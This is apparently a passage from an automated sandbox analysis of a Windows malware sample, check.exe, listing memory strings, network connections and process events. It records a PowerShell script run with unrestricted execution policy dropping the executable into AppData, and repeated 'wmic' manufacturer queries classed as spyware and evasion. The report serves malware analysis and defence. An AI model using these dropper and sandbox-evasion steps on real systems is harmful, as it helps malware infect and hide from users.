Source: check.exe, 00000004.00000003.2259191458.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2262892198.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254482244.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255442707.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255169584.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2263045929.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2259702970.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254329878.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2260368350.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254679847.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254830143.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255084714.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254947920.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255302902.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2256951106.000001C18442C000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2259344289.000001C184425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: check.exe, 00000004.00000003.2259191458.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2262892198.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254482244.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255442707.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255169584.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2263045929.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2259702970.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254329878.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2260368350.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254679847.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2256951106.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254830143.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255084714.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254947920.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255302902.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2259344289.000001C184425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: check.exe, 00000004.00000003.2259344289.000001C184425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: check.exe, 00000004.00000003.2224356100.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2197903575.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2208243247.000001C184430000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223972781.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2224674718.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2225043556.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2198901562.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2202718129.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223559467.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222374412.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222581886.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2226406918.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2196346858.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223857971.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2208719982.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2200573092.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223763846.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2203572756.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2201279267.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222127490.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 
00000004.00000003.2227016406.000001C184425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: check.exe, 00000004.00000003.2224356100.000001C184425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl
Source: check.exe, 00000004.00000003.2224356100.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2197903575.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223972781.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2224674718.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2225043556.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2198901562.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2202718129.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223559467.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222374412.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222581886.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2226406918.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2196346858.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223857971.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2208719982.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2200573092.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223763846.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2203572756.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2201279267.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222127490.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2227016406.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 
00000004.00000003.2223434926.000001C184424000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: check.exe, 00000004.00000003.2224356100.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2197903575.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2208243247.000001C184430000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223972781.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2224674718.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2225043556.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2198901562.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2202718129.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223559467.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222374412.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222581886.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2226406918.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2196346858.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223857971.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2208719982.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2200573092.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223763846.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2203572756.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2201279267.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222127490.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 
00000004.00000003.2227016406.000001C184425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: check.exe, 00000004.00000003.2259191458.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2262892198.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254482244.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255442707.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255169584.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2263045929.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2259702970.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254329878.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2260368350.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254679847.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254830143.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255084714.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2254947920.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255302902.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2256951106.000001C18442C000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2259344289.000001C184425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: check.exe, 00000004.00000003.2224356100.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2197903575.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2208243247.000001C184430000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223972781.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2224674718.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2225043556.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2198901562.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2202718129.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223559467.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222374412.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222581886.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2226406918.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2196346858.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223857971.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2208719982.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2200573092.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223763846.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2203572756.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2201279267.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222127490.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 
00000004.00000003.2227016406.000001C184425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: check.exe, 00000004.00000003.2224356100.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2197903575.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223972781.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2224674718.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2225043556.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2198901562.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2202718129.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223559467.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222374412.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222581886.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2226406918.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2196346858.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223857971.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2208719982.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2200573092.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223763846.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2203572756.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2201279267.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222127490.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2227016406.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 
00000004.00000003.2223434926.000001C184424000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: check.exe, 00000005.00000003.2282239891.0000029FD9AB0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2738851397.0000029FD9F30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
Source: check.exe, 00000005.00000002.2739097916.0000029FDA118000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://goo.gl/zeJZl.
Source: check.exe, 00000005.00000003.2283352961.0000029FD97FB000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
Source: check.exe, 00000005.00000002.2738402783.0000029FD9D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: check.exe, 00000005.00000002.2738402783.0000029FD9D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: check.exe, 00000004.00000003.2224356100.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2197903575.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2208243247.000001C184430000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223972781.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2224674718.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2225043556.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2198901562.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2202718129.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223559467.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222374412.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222581886.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2226406918.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2196346858.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223857971.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2208719982.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2200573092.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223763846.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2203572756.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2201279267.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222127490.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 
00000004.00000003.2227016406.000001C184425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: check.exe, 00000004.00000003.2259344289.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2750079681.00007FF89F314000.00000002.00000001.01000000.0000001A.sdmp, check.exe, 00000005.00000002.2748705247.00007FF89EE10000.00000002.00000001.01000000.0000001B.sdmpString found in binary or memory: https://www.openssl.org/H
Source: check.exe, 00000005.00000002.2736668202.0000029FD93C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
Source: check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282239891.0000029FD9AB0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD9A01000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283651155.0000029FD9A60000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD9A60000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2312815285.0000029FD9A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
Source: check.exe, 00000005.00000002.2758624413.00007FF89FF78000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.python.org/psf/license/)
Source: check.exe, 00000005.00000002.2736668202.0000029FD947E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
Source: check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: check.exe, 00000005.00000003.2283352961.0000029FD97FB000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2319400919.0000029FD9955000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9955000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283651155.0000029FD9955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443

System Summary

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: String function: 00007FF7124F2710 appears 96 times
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1520 -s 892
Source: unicodedata.pyd.4.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: python3.dll.6.drStatic PE information: No import functions for PE file found
Source: python3.dll.4.drStatic PE information: No import functions for PE file found
Source: Qt5Core.dll.4.drStatic PE information: Section: .qtmimed ZLIB complexity 0.997458770800317
Source: Qt5Core.dll.6.drStatic PE information: Section: .qtmimed ZLIB complexity 0.997458770800317
Source: classification engineClassification label: mal68.spyw.evad.winPS1@30/433@1/1
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF89D94FE60 ?loadResource@QTextDocument@@MEAA?AVQVariant@@HAEBVQUrl@@@Z,??0QVariant@@QEAA@$$QEAV0@@Z,??0QVariant@@QEAA@$$QEAV0@@Z,??1QVariant@@QEAA@XZ,5_2_00007FF89D94FE60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\wimnVRrV.zipJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5244:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5688:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3608
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5300
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6256:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1520
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zazl3rte.vp1.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: check.exeString found in binary or memory: <!--StartFragment-->
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
Source: unknownProcess created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1520 -s 892
Source: unknownProcess created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3608 -s 968
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5300 -s 932
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"Jump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturerJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
